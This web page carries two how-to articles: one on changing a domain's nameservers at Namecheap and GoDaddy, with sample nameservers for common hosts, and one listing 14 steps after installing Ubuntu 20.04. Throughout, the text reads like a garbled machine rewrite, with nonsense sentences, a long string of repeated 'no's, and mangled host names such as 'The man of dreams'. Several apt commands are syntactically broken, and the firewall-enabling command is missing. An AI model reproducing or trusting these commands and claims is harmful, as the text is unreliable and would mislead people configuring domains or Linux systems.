The list below hasn’t been fully tested and some nameservers do depend on the web hosting plan you have purchased. It is impossible to list all the nameservers, but you can at least check the nameserver formats, segments and samples.

Setting up name servers for your domain name

A little bit about nameservers

Name servers (the old ones use name servers) are part of the Domain Name Server (DNS) entries. The DNS consists of name, name and mail routing records, also called MX records. Name servers process web requests for your domain. Basically, they tell your web browser where to go to transfer information to your computer via the Internet.

When you enter your domain in your browser, you will probably see a parking page (hosted by your domain registrar) by default. This means that the registrar uses his own name servers. You can update the nameservers with the nameservers of your hosting provider.

At this point, we will consider registering and configuring your domain to interact with the server space of your hosting. This domain<->website is connected via nameservers. Each domain must have name server entries to be available on the Internet.
Name servers often exist in pairs and are supported by IP addresses. See this sample form for a demonstration:

  • ns1.bluehost.com, 162.88.60.37
  • ns2.bluehost.com, 162.88.61.37

When changing the name server at a domain provider, normally only the first part of the name is used: ns1.bluehost.com and ns2.bluehost.com.

Name servers can also be changed using IP addresses. In this case, you must have access to the DNS management area.
When you subscribe to a hosting package, the hosting provider usually sends you an email with the server’s IP address. Once you have an IP address, go to your domain name provider and change the Host (A) record in your DNS settings to reflect the new IP address. This takes one or two hours, depending on what the TTL (time-to-live) is set.
For the time being, I won’t describe this option because it’s not very common. She’s leaving. B. used for GoDaddy web hosting if a non-GoDaddy domain (i.e. a domain which is not registered with GoDaddy) is used.

Already know how to update nameservers? Are you looking for specific name server entries used by popular web hosts? Some are only available directly from your hosting providers. However, you can still find some useful settings, go to the section >> Known Hostname Servers << below.

What do I need to run the nameservers?

All you need is love. But other than that: Domain name and web hosting!
I assume you know how to register a domain name or what you already have. It can’t hurt not knowing him. Keep reading.
In order for your domain to work with your website, you will of course need web hosting. Don’t you have one yet? If you read this guide Choose a Hosting Provider and you will find it.
Most hosting companies will send you an email with relevant hosting information, including your servers with the names you need. Just check your email inbox, it will (probably) be part of your general greeting of the email. Otherwise, host support will keep this information securely available for you.

Please note that you do not have to worry about setting up name servers if you have received your domain directly from your hosting provider. In this case, the hosting provider will install the domain name server for you. Several good web hosts where you can get a free domain name with your hosting package

Disclosure: We only consider products and services that we believe will benefit our readers. Some of the links in this post are affiliate links that allow us to earn commissions. Pay attention: There are no extra costs for you! For more information, please visit our Disclosure page. Thank you very much for your support!

If you already have your domain and web hosting, go to >> Configure Name Server
or go directly to Configure Name Server or GoDaddy name server if your domain is with the right registrars.

Determine the domain name if you do not have

First of all, the domain must be purchased from the registry and the nameservers must be installed on the hosting space of your choice. Yes, the name servers are installed in your domain name registry, not at your hosting provider (unless the domain is registered directly with a web host).
A domain registrar is a company or organisation that provides domain registration services to companies or individuals who want a specific domain name or a specific web address.

Domain Registrar

Domain names also have a TLD (top-level domain or domain extension). The most commonly used are .com, .net, .org, .edu and .me. There are a few others that are not so popular. The list continues for specific country TLD codes, to name a few: .us, .ca, .co.uk, com.au, .fr, .de, .my or .in.
New domain extensions (called donuts) such as .xyz, .dating, .media, .zone, .shop, .pizza or .boutique will cost a little more than normal .net or .com domains.
You can get an overview by searching between the above registrars and searching for a new domain.

Domain and name server issuance

The three most frequently asked questions:

Q : Do I need to know the hosting name servers before I can register a domain?

A : No, you don’t. Normally all you have to do is register your domain first. Then sign up for the web hosting service of your choice. The webhost provides you with name servers for your domain.

Q : Do domain registrars charge extra fees for name server services?

A : No, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no. No, no, no, no, no, no, no, no, no. There’s no extra charge. If you run into a domain registrar who does this, walk away. Domain registration fees apply to name servers, as they account for a large proportion of domain name transactions.

Q : How often can I change or update the nameservers?

A : As many times as necessary. Please note that you will have to wait up to 48 hours for the changes to be fully functional (they usually work for 24 hours).

Name server configuration

After you have thought about your domain name and paid for the chosen domain, you need to install name servers for that domain. Depending on where you purchase your domain, the process of changing the name servers may be different.

You should know by now:

  • Name server information for your domain. Usually hosting companies send you an e-mail with detailed information about the location of your server.
  • Access to the registrar of the domain (email/password). Most registrars will ask you to fill in your account details (including username and password) so that you can log in and manage your new domain.

Each hosting company has pre-installed name servers for its hosting packages.
If you purchased a shared hosting platform with your domain (you probably have a free domain offer), the nameservers should already be configured and you don’t have to worry about the settings.

Most of you have probably registered your domain with one of the popular domain companies. Now you want to link your domain to your website. Is that what you’re doing? Just start by pointing out your domain where your website is located!

Just change the nameservers and wait for the correct execution time. Sounds easy, doesn’t it? Sometimes it’s not that easy. To change your name servers, log in to the registry and go to the DNS or nameserver section of your account.

For better understanding, we explain this configuration process separately for each of these two most popular domain registrars:

I think these two examples should be enough to show how nameservers are configured. Changing name servers with other domain registries is very similar. The procedure always goes through the DNS administration or Name Servers sections, where you can perform your updates and configure new name servers.
In the worst case, remember that you can always get help from the domain service or web hosting provider.

Changing the name server name stack

Let’s take a case where you need to change or modify the registry’s name servers for high-quality domains. Again: This script is only valid if you do not have webhosting namechaep, but only your registered domain.

  1. Go to namecheap.com. Log in to your Namecheap account (enter username and password)

Namecheap registration | Home page

1. Login | Name servers

  1. Once registered, you’ll see your dashboard. Select the domain for which you want to change the name servers (click on the image below to see it in a window).

Select the domain - NameBillig 2. Dashboard | Cheap name servers

  1. Scroll down a bit and find the DNS management section using the drop-down menu. There will be 3 options to choose from: Namecheap BasicDNS, Namecheap Web Hosting DNS and Custom DNS. Touch custom DNS. See the screenshot below.

Username Servers - naming convention 3. User-defined name servers | Name sharing DNS

As you can see in the custom DNS settings, we have our hosting name servers for Siteground. Of course, if we change hosts, the nameservers will change as well. We are happy with Siteground, but in the future, no one knows, we might consider another hosting provider (within our current web hosting plans). Export : Your website can be transferred to any host, just update the nameservers!
Don’t forget that changing the nameservers doesn’t happen immediately. Delivery times may vary depending on many network factors.

GoDaddyChange the name of the server

You change the GoDaddy nameservers to refer to your hosting provider. Of course, your web hosting isn’t Godaddy.

  1. Go to godaddy.com. Log in to a GoDaddy domain account (Domain Control Center). Follow the screenshots below. I don’t think they’re all necessary, but some newcomers like to see things from an amateur perspective.

Request GoDaddy 1a. Login | GoDaddy Domain

GoDaddy login page

1b. Login | GoDaddy Domain Account

  1. The My Products screen appears with a list of your domain names and other products you may own. Select the domain to which you want to update the nameservers. Click the Manage button to go to the settings page. Go to the Advanced Settings field. Here you will find the link Manage DNS, which will take you to the Manage DNS panel. In the DNS management window area, scroll down to the name server area.
    If your domain uses Godaddy name servers, you will see several DNS records in the Records section. You don’t have to worry about that now.
    By default, your domain has GoDady name servers such as ns71.domaincontrol.com and ns72.domaincontrol.com (or an ns NumberNumber.domaincontrol.com entry).

List of GoDaddy domains 2a. List of domains | GoDaddy account

GoDaddy 2b Advanced settings. Advanced Settings Link to GoDaddy

GoDaddy DNS administration

2c. DNS management | GoDaddy nameserver

  1. Click the Edit button next to Default name server usage.
    You will be redirected to the following screen Connect my domain to the website. Click on the link Enter your own (extended) name servers below.
    In the Select Your Name Servers form, enter the custom name servers for your host or web service. If you need more lines/boxes, use the Ad Nameserver button (bottom right). So save your changes!
    As soon as you change it, you will see a message that the update is in progress. Note that at this point you can still see the Records panel with different standard data. But after refreshing the page (or after a few minutes) the recordings are no longer available: We cannot display your DNS data because your name servers are not managed by us.
    Let’s go, let’s go, let’s go, let’s go! You now have to wait until the new nameservers are processed.

Defining the GoDaddy name server

3a. Connect your domain to GoDaddy’s name servers.

Defining the GoDaddy name server

3b. Define your own nameservers | GoDaddy

Update GoDaddy name server information

3c. Name server notification after update | GoDaddy

Name server changes processed by GoDaddy

3d. Update custom name servers | GoDaddy

In the screenshot of GoDaddy Custom Nameservers we use Bluehost nameservers. Yeah, we still have a little website in Bluehost. We carry out a wide range of tests to get a better picture of their services. So don’t forget to enter your nameservers there!

Distribution of name servers

After changing the name server, a network background process called propagation takes place. As with name servers, DNS propagation changes usually take about 24 hours before all web traffic starts to see the content of your website (in my experience, this usually takes no more than 12 hours). In some cases this can take up to 48 hours. For more information, please contact the registry and/or your host company.
There are a number of good websites you can use to check whether or not your domain is spreading to your new server. I bring it up because that’s where the confusion seems to be at its greatest. If you are like me when I started, I had absolutely no idea what DNS or name servers looked like.

Beacon change test

Dnschecker.org : With DNSchecker you can add several DNS records to your domain name and check whether they have spread to different parts of the world. What you are looking for is NA on a drop-down list.

Viewdns.info: ViewDNS has several tools that you can use to check different things, but what you are looking for is a DNS propagation verification tool that allows you to search for domains to check propagation.

Whatsmydns.net: WatsmyDNS offers the same as DNSchecker.org. You can search by subject and by different types of documents dns. Again, search for an NS in the drop-down list next to the search query.

Site24x7.com The first time you land on this site, it might seem scary. If you click on Tools above, you can either wait for the banner to go through the DNS scan for your domain, or click on Check Site Availability in the list of server administrators.

DNS servers Shared server rack that can be part of a DNS server or web hosting space

Popular Web Hostname Servers

Have you lost your hosting provider’s welcome email with name server instructions? You should always try to get the latest name server information directly from your own site or with their support.
The list below is not fully tested, and some nameservers depend on the hosting package you purchased. It is impossible to list all nameservers, but you can at least check the formats, segments and samples of the nameservers.

Web hosting Name server
Bluehost General: ns1.bluehost.com. ns2.bluehost.com
Resellers: ns1.rhostbh.com, ns2.rhostbh.com
GoDaddy *Example: ns72.domaincontrol.com, ns73.domaincontrol.com
Can be in any form: nsNN.domaincontrol.com (numbered N)
The man of dreams ns1.dreamhost.com, ns2.dreamhost.com, ns3.dreamhost.com
InMotion ns1.inmotionhosting.com, ns2.inmotionhosting.com
Reseller: ns1.servconfig.com, ns1.servconfig.com
Website Club *Sample: ns1.us46.siteground.us, ns2.us46.siteground.us
For American hosts. Can be in any form: ns1-2.usNN.siteground.us
Hostgator *For example: ns8430.hostgator.com, ns8431.hostgator.com
Can be in any form: nsNNNN.hostgator.com
A2Hosting ns1.a2hosting.com,
ns3.a2hosting.com, ns4.a2hosting.com
BigScoots ns1.bigscoots.com, ns2.bigscoots.com
HostPapa ns1.hostpapa.com, ns2.hostpapa.com
NameEmployees dns1.namecheaphosting.com, dns2.namecheaphosting.com
WebHostingPad ns5.webhostingpad.com, ns6.webhostingpad.com (or any other ns number).

create dns server linux,how to setup a home dns server

Read More

Top 14 Things to Do After Ubuntu 20.04 LTS Installation

The 23rd. In April 2020, the Kanonengruppe published the long-awaited Ubuntu on 20.04. The latest release replaces the predecessor of Ubuntu 18.04 LTS and comes with a stylish new desktop theme, an improved look, the 5.4 Linux kernel, ZFS file system support and tons of hardware and software improvements. Ubuntu 20.04 is a Long-Term Service (LTS) version and will be supported like any other LTS version for 5 years until 2025.

After you have installed Ubuntu 20.04 LTS on your system, here are some of the 14 best things to consider before using your system fully.

1) Install the latest updates of package

After the installation of a new Linux system it is always a good idea to update system packages and repositories. This will help you become familiar with the latest system packages and security updates. So to update the system and system packages, execute the command:

[Secure email]:~$ sudo apt update && sudo apt upgrade -y

2) Adjust appearance/look and feel

Since the release of Ubuntu 18.10, the standard Ubuntu theme is always elegant and neat yaru. This time, the canonical team intensified its efforts and decided to send 3 versions of the Yara theme with a set of polished icons. The options for the Yaru themes are light, standard and dark. By default Ubuntu 20.04 LTS launches the standard version of the Yaru theme.

Appearance-Ubuntu20-04-LTS

If you switch to a dark theme, you will get the picture below:

Yaru-Teme-Mode-Ubuntu20-04-LTS

There are also Ubuntu 20.04 games with additional background images that you can use to add a touch of color and improve the appearance of your wallpaper.

Ubuntu20-04- Wallpaper

In addition to being able to switch between themes and backgrounds, users can play with the docking station settings and increase the size of the icons.

Changing symbol size - Ubuntu20-04-LTS

3) Installation of the GNOMEretrofitting tool

GNOME Tweaks, commonly referred to as the GNOME Tweak tool, is a free configuration tool that gives you more flexibility to further customize the appearance of the GNOME desktop, shell extensions, windowing and performance settings, to name but a few.

To install GNOME Tweak, follow the :

~$ sudo apt set gnome-tweak-tool -y

Midget Twix Ubuntu-20-04-LTS

4) Installation of multimedia codecs for playback of MPEG4 and other multimedia files.

By default, Ubuntu 20.04 LTS, like other previous versions, does not support playback of multimedia files such as MPEG4 and AVI. If you want to play such media files, you need to install the Ubuntu package with limited additional features. It is software with basic applications such as media codecs, Adobe Flash and GStreamer. To install a package with a limited number of Ubuntu add-ons, follow the command below:

[Protected Email]:~$ sudo apt install ubuntu-restricted-extras -y

On the EULA screen, use the tab key to accept the conditions of the EULA and press ENTER in the Ok option.

Hypothesis - heat conversion - text fonts - boat20-04

On the next screen, select Yes to accept the terms of the license. Then the system will start installing the Ubuntu limited add-on package.

Accept - YEULA License - Ubuntu-20-04-LTS

5) Firewall activation and configuration (ufw)

The firewall (ufw) is installed automatically when you install Ubuntu 20.04 LTS, but is disabled by default. So he has to make sure the system is safe.

ufwStatus sudostatus: inactive[secure email]:~$ ufwStatus sudostatus: inactive[secure email]:~$

Run the following command to activate the Firewall,

The command can interrupt existing ssh connections. Keep working (y|n) ? y
The firewall is active and enabled at startup
[Email Protection]:~$.

6) Install Synaptic Package Manager.

Install the Synaptic package management tool, it provides a graphical interface for package management, run the command line below to install Synaptic,

~$ sudo apt install Synaptic -y

Once it is installed, we can access it by performing a synaptic search using the hyphen,

Synaptic Packet Manager-Ubuntu20-04-LTS

7) Customize your email client

Topicality is a top priority for most users. Of course e-mail is accessible via a web browser, but Linux and especially Ubuntu 20.04 have made working with e-mail easier by using e-mail clients such as the native e-mail client Thunderbird.  You can easily follow the instructions to add an email account to your Thunderbird mail program to receive and send emails. If you don’t like Thunderbird, there are other options you can install, such as Evolution.

8) Adjusting the time difference (backup tool)

Securing is one of the most important tasks that every Linux user must remember. Things may not go the way you expect, and if they do, your system could crash fatally, resulting in the loss of valuable data. All it takes is a wrong command that is executed to make your system fail. To prepare for the worst case scenario, it is always wise to have a system backup. Timeshift is an open source application that allows Linux users to create a system restore point from which they can return if something goes wrong.

TimeShift takes incremental snapshots of the entire operating system, including the home directory, settings, and system configuration. In case of a problem, you can make your system work properly again.

You can install Timeshift by adding Timeshift PPA as shown in the figure :

[protected email]:~$ sudo apt-add-repository -y ppa:teejee2008/ppa

The system must then be updated to synchronize with the time difference APP.

[secure email]:~$ sudo apt update

And finally, install Timeshift with the command:

~$ sudo apt install timeshift-y

Time difference backup tool-Ubuntu-20-04-LTS

9) Installation of required software applications

Although Ubuntu 20.04 LTS comes with all the basic applications you need, some may not have all the capabilities you need to perform certain tasks. For example, some video formats may not work properly because some video codecs are missing.

Fortunately, there are many other multifunctional, open and free applications that extend the functionality of standard applications and provide a better user experience.  Below is a brief description of some of the applications you can install on your system.

  • The VLC Media Player is a very popular multifunctional video and audio player.
  • Google Chrome : A widely used multifunctional web browser with many functions and features.
  • GIMP: Free and free photo editor that can perform many tasks such as photo editing, taking screenshots, free form drawing and more complex graphical editing tasks.
  • Shot in the flames: A free and powerful tool for capturing the screen
  • VirtualBox : A free and open source virtualization platform for creating and running virtual machines.
  • SKYPE is a free means of communication with which we can make online audio and video calls.
  • FileZilla is a free and open ftp and sftp client that allows files to be transferred between the ftp/sftp client and the server using the ftp and scp protocols.

An easy way to install these applications is by using the good old Ubuntu Software Center. The applications are divided into several main categories to help you navigate and install the selected applications:

  • Audio and video
  • Communication and news
  • Games
  • Productivity
  • Graphic design and photography
  • Additions

Ubuntu-Ubuntu-20-04-LTS software

10) Installation of GNOME shield extensions

The GNOME Shell Extensions are excellent pieces of code that allow you to customize your desktop and extend the functionality of the GNOME Desktop. A popular GNOME extension is the GNOME OpenWeather shell, which opens when you click on it and displays it in a certain location.

To install the GNOME shell extensions, use the following commands,

[protected email]:~$ sudo apt gnome-shell extensions install -y

Now open a web browser, add the GNOME Shell Integration Module, and restart the terminal under the command

~$ sudo apt install chrome-gnome-shell -y

To return to the web browser, click GNOME Shell Extension and then click OpenWeather Extension,

Expansion OpenWeather-Ubuntu20-04-LTS

Turn it on,

Opening the power supply - Extending weather protection - Ubuntu20-04-LTS

As you can see on the line above, the Open Weather application is visible, now set your current position.

11) Setting up Google Drive using online accounts.

Thanks to the online account function in Ubuntu 20.04 LTS we can easily configure our Google reader,

Go to Settings -> Online Accounts -> select Google.

Google Drive Account - Ubuntu-20-04-LTS

Enter your Gmail ID and follow the on-screen instructions to complete the installation.

Gmail account online account Ubuntu20-04-LTS

12) Activating the night lighting

If we use the Ubuntu system at night, it is advisable to switch on the night lighting to reduce the strain on the eyes. To activate the night lighting mode, go to Settings -> Display on screen.

Ubuntu-20-04-LTS Pilot model

13) Look what’s new.

Ubuntu 20.04 brings a new perspective on Yara, which was released on 18.10 on Ubuntu. You’ll also get a new GNOME 3.36 desktop environment with polished icons and buttons and a more aesthetic look. The new office environment also has a new dark theme.  You may also need the split-zoom function, which allows you to get high-resolution screens and monitors.

In addition, you can use the latest versions of software applications such as :

  • Firefox 75.0
  •  LibreOffice 6.4.3
  • Thunderbird 68.7

14) Install the Windows software and the game with PlayOnLinux.

Wine is an open source application that makes it possible to run Windows applications on Linux. PlayOnLinux is a leading program for wine. With Wine and PlayOnLinux you can run applications that otherwise would not work on Linux, such as games and Adobe Photoshop.

To install PlayonLinux together with Wine, follow the aptical command below,

E-mail secure]:~$ sudo apt install playonlinux -y [E-mail secure]:~$ sudo apt install playonlinux -y

PlayonLinux-Ubuntu20-04-LTS

Here we finish our top 14 things after the installation of the new Ubuntu 20.04 LTS view. It is expected that the latest version of Ubuntu will be highly appreciated by most Ubuntu fans for its popularity and ease of use.top 10 things to do after installing ubuntu 18.04 lts desktop,10 things to do after installing linux

Read More